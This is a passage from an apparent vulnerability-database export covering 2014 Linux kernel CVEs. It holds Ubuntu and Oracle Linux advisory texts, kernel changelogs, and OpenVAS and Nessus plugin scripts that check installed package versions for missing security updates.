ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841948\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-03 05:55:15 +0200 (Wed, 03 Sep 2014)\");\n script_cve_id(\"CVE-2014-3917\", \"CVE-2014-4027\", \"CVE-2014-4171\", \"CVE-2014-4508\",\n \"CVE-2014-4652\", \"CVE-2014-4653\", \"CVE-2014-4654\", \"CVE-2014-4655\",\n \"CVE-2014-4656\", \"CVE-2014-4667\", \"CVE-2014-5077\");\n script_tag(name:\"cvss_base\", value:\"6.6\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:C\");\n script_name(\"Ubuntu Update for linux USN-2334-1\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"An flaw was discovered in the Linux kernel's audit subsystem\nwhen auditing certain syscalls. A local attacker could exploit this flaw to\nobtain potentially sensitive single-bit values from kernel memory or cause a\ndenial of service (OOPS). (CVE-2014-3917)\n\nAn information leak was discovered in the rd_mcp backend of the iSCSI\ntarget subsystem in the Linux kernel. A local user could exploit this flaw\nto obtain sensitive information from ramdisk_mcp memory by leveraging\naccess to a SCSI initiator. (CVE-2014-4027)\n\nSasha Levin reported an issue with the Linux kernel's shared memory\nsubsystem when used with range notifications and hole punching. A local\nuser could exploit this flaw to cause a denial of service. (CVE-2014-4171)\n\nToralf Fö rster reported an error in the Linux kernels syscall auditing on\n32 bit x86 platforms. A local user could exploit this flaw to cause a\ndenial of service (OOPS and system crash). (CVE-2014-4508)\n\nAn information leak was discovered in the control implementation of the\nAdvanced Linux Sound Architecture (ALSA) subsystem in the Linux kernel. A\nlocal user could exploit this flaw to obtain sensitive information from\nkernel memory. (CVE-2014-4652)\n\nA use-after-free flaw was discovered in the Advanced Linux Sound\nArchitecture (ALSA) control implementation of the Linux kernel. A local\nuser could exploit this flaw to cause a denial of service (system crash).\n(CVE-2014-4653)\n\nA authorization bug was discovered with the snd_ctl_elem_add function of\nthe Advanced Linux Sound Architecture (ALSA) in the Linux kernel. A local\nuser could exploit his bug to cause a denial of service (remove kernel\ncontrols). (CVE-2014-4654)\n\nA flaw discovered in how the snd_ctl_elem function of the Advanced Linux\nSound Architecture (ALSA) handled a reference count. A local user could\nexploit this flaw to cause a denial of service (integer overflow and limit\nbypass). (CVE-2014-4655)\n\nAn integer overflow flaw was discovered in the control implementation of\nthe Advanced Linux Sound Architecture (ALSA). A local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2014-4656)\n\nAn integer underflow flaw was discovered in the Linux kernel's handling of\nthe backlog value for certain SCTP packets. A remote attacker could exploit\nthis flaw to cause a denial of service (socket outage) via a crafted SCTP\npacket. (CVE-2014-4667)\n\nJason Gunthorpe reported a flaw with SCTP authentication in the Linux\nkernel. A remote attacker could exploit this flaw to cause a denial of\nservice (NULL pointer dereference and OOPS). (CVE-2014-5077)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2334-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2334-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-68-generic\", ver:\"3.2.0-68.102\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-68-generic-pae\", ver:\"3.2.0-68.102\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-68-highbank\", ver:\"3.2.0-68.102\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-68-omap\", ver:\"3.2.0-68.102\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-68-powerpc-smp\", ver:\"3.2.0-68.102\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-68-powerpc64-smp\", ver:\"3.2.0-68.102\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-68-virtual\", ver:\"3.2.0-68.102\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:47", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3186", "CVE-2014-1739", "CVE-2014-3688", "CVE-2014-3181", "CVE-2014-4027", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-6410"], "description": "[2.6.39-400.215.14] \r\n- HID: magicmouse: sanity check report size in raw_event() callback (Jiri Kosina) [Orabug: 19849355] {CVE-2014-3181} \r\n- ALSA: control: Protect user controls against concurrent access (Lars-Peter Clausen) [Orabug: 20192542] {CVE-2014-4652} \r\n- target/rd: Refactor rd_build_device_space + rd_release_device_space (Nicholas Bellinger) [Orabug: 20192517] {CVE-2014-4027} \r\n- media-device: fix infoleak in ioctl media_enum_entities() (Salva Peiro) [Orabug: 20192501] {CVE-2014-1739} {CVE-2014-1739} \r\n- udf: Avoid infinite loop when processing indirect ICBs (Jan Kara) [Orabug: 20192449] {CVE-2014-6410} \r\n- ALSA: control: Make sure that id->index does not overflow (Lars-Peter Clausen) [Orabug: 20192418] {CVE-2014-4656} \r\n- ALSA: control: Handle numid overflow (Lars-Peter Clausen) [Orabug: 20192376] {CVE-2014-465} \r\n- HID: picolcd: sanity check report size in raw_event() callback (Jiri Kosina) [Orabug: 20192205] {CVE-2014-3186} \r\n- net: sctp: fix remote memory pressure from excessive queueing (Daniel Borkmann) [Orabug: 20192059] {CVE-2014-3688} ", "edition": 4, "modified": "2014-12-11T00:00:00", "published": "2014-12-11T00:00:00", "id": "ELSA-2014-3104", "href": "http://linux.oracle.com/errata/ELSA-2014-3104.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:31", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-3688", "CVE-2014-4027", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-6410"], "description": "kernel-uek\n[3.8.13-55.1.1]\n- ALSA: control: Protect user controls against concurrent access (Lars-Peter Clausen) [Orabug: 20192540] {CVE-2014-4652}\n- target/rd: Refactor rd_build_device_space + rd_release_device_space (Nicholas Bellinger) [Orabug: 20192516] {CVE-2014-4027}\n- HID: logitech: perform bounds checking on device_id early enough (Jiri Kosina) [Orabug: 20192477] {CVE-2014-3182}\n- udf: Avoid infinite loop when processing indirect ICBs (Jan Kara) [Orabug: 20192448] {CVE-2014-6410}\n- ALSA: control: Make sure that id->index does not overflow (Lars-Peter Clausen) [Orabug: 20192416] {CVE-2014-4656}\n- ALSA: control: Handle numid overflow (Lars-Peter Clausen) [Orabug: 20192367] {CVE-2014-4656}\n- HID: picolcd: sanity check report size in raw_event() callback (Jiri Kosina) [Orabug: 20192208] {CVE-2014-3186}\n- net: sctp: fix remote memory pressure from excessive queueing (Daniel Borkmann) [Orabug: 20192058] {CVE-2014-3688}", "edition": 4, "modified": "2014-12-11T00:00:00", "published": "2014-12-11T00:00:00", "id": "ELSA-2014-3103", "href": "http://linux.oracle.com/errata/ELSA-2014-3103.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:53", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3688", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184"], "description": "kernel-uek\n[2.6.32-400.36.12]\n- HID: fix a couple of off-by-ones (Jiri Kosina) [Orabug: 19849320] {CVE-2014-3184}\n- ALSA: control: Protect user controls against concurrent access (Lars-Peter Clausen) [Orabug: 20192545] {CVE-2014-4652}\n- udf: Avoid infinite loop when processing indirect ICBs (Jan Kara) [Orabug: 20192451] {CVE-2014-6410}\n- ALSA: control: Make sure that id->index does not overflow (Lars-Peter Clausen) [Orabug: 20192420] {CVE-2014-4656}\n- ALSA: control: Handle numid overflow (Lars-Peter Clausen) [Orabug: 20192379] {CVE-2014-4656}\n- net: sctp: fix remote memory pressure from excessive queueing (Daniel Borkmann) [Orabug: 20192060] {CVE-2014-3688}", "edition": 4, "modified": "2014-12-11T00:00:00", "published": "2014-12-11T00:00:00", "id": "ELSA-2014-3105", "href": "http://linux.oracle.com/errata/ELSA-2014-3105.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:44", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3646", "CVE-2014-3182", "CVE-2014-3186", "CVE-2014-4655", "CVE-2014-3673", "CVE-2014-1739", "CVE-2014-3688", "CVE-2013-2929", "CVE-2014-3611", "CVE-2014-3181", "CVE-2014-3645", "CVE-2014-3185", "CVE-2014-4027", "CVE-2014-4654", "CVE-2014-5045", "CVE-2014-4656", "CVE-2014-3631", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184", "CVE-2014-3687"], "description": "[3.10.0-123.13.1]\n- Oracle Linux certificates (Alexey Petrenko)\n[3.10.0-123.13.1]\n- [powerpc] mm: Make sure a local_irq_disable prevent a parallel THP split (Don Zickus) [1151057 1083296]\n- [powerpc] Implement __get_user_pages_fast() (Don Zickus) [1151057 1083296]\n- [scsi] vmw_pvscsi: Some improvements in pvscsi driver (Ewan Milne) [1144016 1075090]\n- [scsi] vmw_pvscsi: Add support for I/O requests coalescing (Ewan Milne) [1144016 1075090]\n- [scsi] vmw_pvscsi: Fix pvscsi_abort() function (Ewan Milne) [1144016 1075090]\n[3.10.0-123.12.1]\n- [alsa] control: Make sure that id->index does not overflow (Jaroslav Kysela) [1117313 1117314] {CVE-2014-4656}\n- [alsa] control: Handle numid overflow (Jaroslav Kysela) [1117313 1117314] {CVE-2014-4656}\n- [alsa] control: Protect user controls against concurrent access (Jaroslav Kysela) [1117338 1117339] {CVE-2014-4652}\n- [alsa] control: Fix replacing user controls (Jaroslav Kysela) [1117323 1117324] {CVE-2014-4654 CVE-2014-4655}\n- [net] sctp: fix remote memory pressure from excessive queueing (Daniel Borkmann) [1155750 1152755] {CVE-2014-3688}\n- [net] sctp: fix panic on duplicate ASCONF chunks (Daniel Borkmann) [1155737 1152755] {CVE-2014-3687}\n- [net] sctp: fix skb_over_panic when receiving malformed ASCONF chunks (Daniel Borkmann) [1147856 1152755] {CVE-2014-3673}\n- [net] sctp: handle association restarts when the socket is closed (Daniel Borkmann) [1147856 1152755] [1155737 1152755] [1155750 1152755]\n- [pci] Add ACS quirk for Intel 10G NICs (Alex Williamson) [1156447 1141399]\n- [pci] Add ACS quirk for Solarflare SFC9120 & SFC9140 (Alex Williamson) [1158316 1131552]\n- [lib] assoc_array: Fix termination condition in assoc array garbage collection (David Howells) [1155136 1139431] {CVE-2014-3631}\n- [block] cfq-iosched: Add comments on update timing of weight (Vivek Goyal) [1152874 1116126]\n- [block] cfq-iosched: Fix wrong children_weight calculation (Vivek Goyal) [1152874 1116126]\n- [powerpc] mm: Check paca psize is up to date for huge mappings (Gustavo Duarte) [1151927 1107337]\n- [x86] perf/intel: ignore CondChgd bit to avoid false NMI handling (Don Zickus) [1146819 1110264]\n- [x86] smpboot: initialize secondary CPU only if master CPU will wait for it (Phillip Lougher) [1144295 968147]\n- [x86] smpboot: Log error on secondary CPU wakeup failure at ERR level (Igor Mammedov) [1144295 968147]\n- [x86] smpboot: Fix list/memory corruption on CPU hotplug (Igor Mammedov) [1144295 968147]\n- [acpi] processor: do not mark present at boot but not onlined CPU as onlined (Igor Mammedov) [1144295 968147]\n- [fs] udf: Avoid infinite loop when processing indirect ICBs (Jacob Tanenbaum) [1142321 1142322] {CVE-2014-6410}\n- [hid] picolcd: fix memory corruption via OOB write (Jacob Tanenbaum) [1141408 1141409] {CVE-2014-3186}\n- [usb] serial/whiteheat: fix memory corruption flaw (Jacob Tanenbaum) [1141403 1141404] {CVE-2014-3185}\n- [hid] fix off by one error in various _report_fixup routines (Jacob Tanenbaum) [1141393 1141394] {CVE-2014-3184}\n- [hid] logitech-dj: fix OOB array access (Jacob Tanenbaum) [1141211 1141212] {CVE-2014-3182}\n- [hid] fix OOB write in magicmouse driver (Jacob Tanenbaum) [1141176 1141177] {CVE-2014-3181}\n- [acpi] Fix bug when ACPI reset register is implemented in system memory (Nigel Croxon) [1136525 1109971]\n- [fs] vfs: fix ref count leak in path_mountpoint() (Ian Kent) [1122481 1122376] {CVE-2014-5045}\n- [kernel] ptrace: get_dumpable() incorrect tests (Jacob Tanenbaum) [1111605 1111606] {CVE-2013-2929}\n- [media] media-device: fix an information leakage (Jacob Tanenbaum) [1109776 1109777] {CVE-2014-1739}\n- [target] rd: Refactor rd_build_device_space + rd_release_device_space (Denys Vlasenko) [1108754 1108755] {CVE-2014-4027}\n- [block] blkcg: fix use-after-free in __blkg_release_rcu() by making blkcg_gq refcnt an atomic_t (Vivek Goyal) [1158313 1118436]\n- [virt] kvm: fix PIT timer race condition (Petr Matousek) [1144879 1144880] {CVE-2014-3611}\n- [virt] kvm/vmx: handle invept and invvpid vm exits gracefully (Petr Matousek) [1145449 1116936] [1144828 1144829] {CVE-2014-3645 CVE-2014-3646}\n[3.10.0-123.11.1]\n- [net] fix UDP tunnel GSO of frag_list GRO packets (Phillip Lougher) [1149661 1119392]\n[3.10.0-123.10.1]\n- [pci] hotplug: Prevent NULL dereference during pciehp probe (Myron Stowe) [1142393 1133107]\n- [kernel] workqueue: apply __WQ_ORDERED to create_singlethread_workqueue() (Tomas Henzl) [1151314 1131563]", "edition": 4, "modified": "2014-12-09T00:00:00", "published": "2014-12-09T00:00:00", "id": "ELSA-2014-1971", "href": "http://linux.oracle.com/errata/ELSA-2014-1971.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "nessus": [{"lastseen": "2021-01-17T12:49:41", "description": "Description of changes:\n\nkernel-uek\n[3.8.13-55.1.1.el7uek]\n- ALSA: control: Protect user controls against concurrent access \n(Lars-Peter Clausen) [Orabug: 20192540] {CVE-2014-4652}\n- target/rd: Refactor rd_build_device_space + rd_release_device_space \n(Nicholas Bellinger) [Orabug: 20192516] {CVE-2014-4027}\n- HID: logitech: perform bounds checking on device_id early enough (Jiri \nKosina) [Orabug: 20192477] {CVE-2014-3182}\n- udf: Avoid infinite loop when processing indirect ICBs (Jan Kara) \n[Orabug: 20192448] {CVE-2014-6410}\n- ALSA: control: Make sure that id->index does not overflow (Lars-Peter \nClausen) [Orabug: 20192416] {CVE-2014-4656}\n- ALSA: control: Handle numid overflow (Lars-Peter Clausen) [Orabug: \n20192367] {CVE-2014-4656}\n- HID: picolcd: sanity check report size in raw_event() callback (Jiri \nKosina) [Orabug: 20192208] {CVE-2014-3186}\n- net: sctp: fix remote memory pressure from excessive queueing (Daniel \nBorkmann) [Orabug: 20192058] {CVE-2014-3688}", "edition": 20, "published": "2014-12-15T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2014-3103)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3182", "CVE-2014-3186", "CVE-2014-3688", "CVE-2014-4027", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-6410"], "modified": "2014-12-15T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-55.1.1.el6uek", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-55.1.1.el7uek", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2014-3103.NASL", "href": "https://www.tenable.com/plugins/nessus/80004", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3103.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80004);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-3182\", \"CVE-2014-3186\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4656\", \"CVE-2014-6410\");\n script_bugtraq_id(68159, 68163, 68170, 69763, 69770, 69799, 70768);\n\n script_name(english:\"Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2014-3103)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\nkernel-uek\n[3.8.13-55.1.1.el7uek]\n- ALSA: control: Protect user controls against concurrent access \n(Lars-Peter Clausen) [Orabug: 20192540] {CVE-2014-4652}\n- target/rd: Refactor rd_build_device_space + rd_release_device_space \n(Nicholas Bellinger) [Orabug: 20192516] {CVE-2014-4027}\n- HID: logitech: perform bounds checking on device_id early enough (Jiri \nKosina) [Orabug: 20192477] {CVE-2014-3182}\n- udf: Avoid infinite loop when processing indirect ICBs (Jan Kara) \n[Orabug: 20192448] {CVE-2014-6410}\n- ALSA: control: Make sure that id->index does not overflow (Lars-Peter \nClausen) [Orabug: 20192416] {CVE-2014-4656}\n- ALSA: control: Handle numid overflow (Lars-Peter Clausen) [Orabug: \n20192367] {CVE-2014-4656}\n- HID: picolcd: sanity check report size in raw_event() callback (Jiri \nKosina) [Orabug: 20192208] {CVE-2014-3186}\n- net: sctp: fix remote memory pressure from excessive queueing (Daniel \nBorkmann) [Orabug: 20192058] {CVE-2014-3688}\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-December/004715.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-December/004716.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-55.1.1.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-55.1.1.el7uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/06/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2014-3182\", \"CVE-2014-3186\", \"CVE-2014-3688\", \"CVE-2014-4027\", \"CVE-2014-4652\", \"CVE-2014-4656\", \"CVE-2014-6410\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2014-3103\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"3.8\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-55.1.1.el6uek-0.4.3-4.el6\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-55.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-55.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-55.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-55.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-55.1.1.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL6\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-55.1.1.el6uek\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"dtrace-modules-3.8.13-55.1.1.el7uek-0.4.3-4.el7\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-3.8.13-55.1.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-3.8.13-55.1.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-debug-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-debug-devel-3.8.13-55.1.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-devel-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-devel-3.8.13-55.1.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-doc-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-doc-3.8.13-55.1.1.el7uek\")) flag++;\nif (rpm_exists(release:\"EL7\", rpm:\"kernel-uek-firmware-3.8.13\") && rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"kernel-uek-firmware-3.8.13-55.1.1.el7uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:49:41", "description": "Description of changes:\n\nkernel-uek\n[2.6.32-400.36.12.el6uek]\n- HID: fix a couple of off-by-ones (Jiri Kosina) [Orabug: 19849320] \n{CVE-2014-3184}\n- ALSA: control: Protect user controls against concurrent access \n(Lars-Peter Clausen) [Orabug: 20192545] {CVE-2014-4652}\n- udf: Avoid infinite loop when processing indirect ICBs (Jan Kara) \n[Orabug: 20192451] {CVE-2014-6410}\n- ALSA: control: Make sure that id->index does not overflow (Lars-Peter \nClausen) [Orabug: 20192420] {CVE-2014-4656}\n- ALSA: control: Handle numid overflow (Lars-Peter Clausen) [Orabug: \n20192379] {CVE-2014-4656}\n- net: sctp: fix remote memory pressure from excessive queueing (Daniel \nBorkmann) [Orabug: 20192060] {CVE-2014-3688}", "edition": 20, "published": "2014-12-15T00:00:00", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2014-3105)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3688", "CVE-2014-4656", "CVE-2014-4652", "CVE-2014-6410", "CVE-2014-3184"], "modified": "2014-12-15T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", 